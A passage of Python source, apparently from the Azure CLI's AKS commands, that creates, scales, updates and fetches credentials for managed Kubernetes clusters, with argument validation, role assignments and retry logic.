load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
private_dns_zone=None,
fqdn_subdomain=None,
enable_managed_identity=True,
assign_identity=None,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_encryption_at_host=False,
assign_kubelet_identity=None,
enable_ultra_ssd=False,
edge_zone=None,
no_wait=False,
yes=False,
enable_azure_rbac=False):
ManagedClusterWindowsProfile = cmd.get_models('ManagedClusterWindowsProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceNetworkProfile = cmd.get_models('ContainerServiceNetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceLinuxProfile = cmd.get_models('ContainerServiceLinuxProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceSshConfiguration = cmd.get_models('ContainerServiceSshConfiguration',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceSshPublicKey = cmd.get_models('ContainerServiceSshPublicKey',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAgentPoolProfile = cmd.get_models('ManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
UserAssignedIdentity = cmd.get_models(
'UserAssignedIdentity',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedCluster = cmd.get_models('ManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedServiceIdentityUserAssignedIdentitiesValue = cmd.get_models(
'ManagedServiceIdentityUserAssignedIdentitiesValue',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if dns_name_prefix and fqdn_subdomain:
raise MutuallyExclusiveArgumentError(
'--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
if not dns_name_prefix and not fqdn_subdomain:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(
load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError(
'--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
# Must be 12 chars or less before ACS RP adds to it
name=_trim_nodepoolname(nodepool_name),
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(
admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username or windows_admin_password:
# To avoid that windows_admin_password is set but windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
# The validation for admin_username in ManagedClusterWindowsProfile will fail even if
# users still set windows_admin_username to empty here
except NoTTYException:
raise CLIError(
'Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
# If customer explicitly provide a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
# Skip create service principal profile for the cluster if the cluster
# enables managed identity and customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
if not(enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
fqdn_subdomain=fqdn_subdomain, location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
'(option --assign-identity) when you want to bring your own'
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(
cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
cmd,
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(
outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError(
'Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
aci_subnet_name,
vnet_subnet_id,
appgw_name,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(
cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
if disable_rbac and enable_azure_rbac:
raise ArgumentUsageError(
'"--enable-azure-rbac" can not be used together with "--disable-rbac"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
# ids -> i_ds due to track 2 naming issue
admin_group_object_i_ds=_parse_comma_separated_list(
aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if enable_azure_rbac is True:
raise ArgumentUsageError(
'"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
cmd,
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError(
'specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if not enable_managed_identity and assign_identity:
raise ArgumentUsageError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
# pylint: disable=line-too-long
assign_identity: ManagedServiceIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
identity_profile = None
if assign_kubelet_identity:
if not assign_identity:
# pylint: disable=line-too-long
raise ArgumentUsageError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
identity_profile = {
# pylint: disable=line-too-long
'kubeletidentity': UserAssignedIdentity(
resource_id=assign_kubelet_identity,
client_id=kubelet_identity.client_id,
object_id=kubelet_identity.principal_id
)
}
cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
# ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
_ensure_cluster_identity_permission_on_kubelet_identity(
cmd,
cluster_identity_object_id,
assign_kubelet_identity)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
api_server_access_profile=api_server_access_profile,
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
identity_profile=identity_profile
)
use_custom_private_dns_zone = False
if private_dns_zone:
if not enable_private_cluster:
raise InvalidArgumentValueError("Invalid private dns zone for public cluster. "
"It should always be empty for public cluster")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
from msrestazure.tools import is_valid_resource_id
if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM:
if is_valid_resource_id(private_dns_zone):
use_custom_private_dns_zone = True
else:
raise InvalidArgumentValueError(
private_dns_zone + " is not a valid Azure resource ID.")
if fqdn_subdomain:
if not use_custom_private_dns_zone:
raise ArgumentUsageError("--fqdn-subdomain should only be used for "
"private cluster with custom private dns zone")
mc.fqdn_subdomain = fqdn_subdomain
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if edge_zone:
ExtendedLocation = cmd.get_models('ExtendedLocation',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ExtendedLocationTypes = cmd.get_models('ExtendedLocationTypes',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
mc.extended_location = ExtendedLocation(
name=edge_zone,
type=ExtendedLocationTypes.EDGE_ZONE
)
# Add AAD session key to header.
# If principal_obj is None, we will not add this header, this can happen
# when the cluster enables managed identity. In this case, the header is useless
# and that's OK to not add this header
custom_headers = None
if principal_obj:
custom_headers = {
'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_virtual_node,
need_post_creation_vnet_permission_granting,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
custom_headers,
no_wait)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name,
appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
no_wait=no_wait)
enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
instance.addon_profiles[virtual_node_addon_name].enabled)
need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_pull_for_result:
if enable_monitoring:
_ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
if enable_monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(
result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
# Check if KUBECONFIG environmental variable is set
# If path is different than default then that means -f/--file is passed
# in which case we ignore the KUBECONFIG variable
if "KUBECONFIG" in os.environ and path == os.path.join(os.path.expanduser('~'), '.kube', 'config'):
path = os.environ["KUBECONFIG"]
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError(
'usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError(
'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=service_principal, secret=client_secret
)
return sdk_no_wait(no_wait,
client.begin_reset_service_principal_profile,
resource_group_name,
name, service_principal_profile)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.begin_reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
no_uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
windows_admin_password=None,
enable_managed_identity=False,
assign_identity=None,
yes=False,
no_wait=False,
enable_azure_rbac=False,
disable_azure_rbac=False):
ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedServiceIdentityUserAssignedIdentitiesValue = cmd.get_models(
'ManagedServiceIdentityUserAssignedIdentitiesValue',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (
aad_tenant_id is None and aad_admin_group_object_ids is None and
not enable_azure_rbac and not disable_azure_rbac)
# pylint: disable=too-many-boolean-expressions
if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
not update_lb_profile and
not attach_acr and
not detach_acr and
not uptime_sla and
not no_uptime_sla and
api_server_authorized_ip_ranges is None and
not enable_aad and
not update_aad_profile and
not enable_ahub and
not disable_ahub and
not windows_admin_password and
not enable_managed_identity and
not assign_identity):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--load-balancer-managed-outbound-ip-count" or'
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or'
'"--load-balancer-outbound-ports" or'
'"--load-balancer-idle-timeout" or'
'"--attach-acr" or "--detach-acr" or'
'"--uptime-sla" or'
'"--no-uptime-sla" or '
'"--api-server-authorized-ip-ranges" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--windows-admin-password" or '
'"--enable-managed-identity" or '
'"--assign-identity" or '
'"--enable-azure-rbac" or '
'"--disable-azure-rbac"')
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning(
'Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear autoscaler profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if uptime_sla and no_uptime_sla:
raise CLIError(
'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if no_uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Free"
)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
cmd,
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(
cmd,
api_server_authorized_ip_ranges, instance=instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError(
'Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/"'
'"--enable-azure-rbac/--disable-azure-rbac"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
# ids -> i_ds due to track 2 naming issue
instance.aad_profile.admin_group_object_i_ds = _parse_comma_separated_list(
aad_admin_group_object_ids)
if enable_azure_rbac and disable_azure_rbac:
raise MutuallyExclusiveArgumentError(
'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
if enable_azure_rbac:
instance.aad_profile.enable_azure_rbac = True
if disable_azure_rbac:
instance.aad_profile.enable_azure_rbac = False
if enable_ahub and disable_ahub:
raise CLIError(
'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if windows_admin_password:
instance.windows_profile.admin_password = windows_admin_password
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
msg = ""
if current_identity_type == "spn":
msg = ('Your cluster is using service principal, and you are going to update '
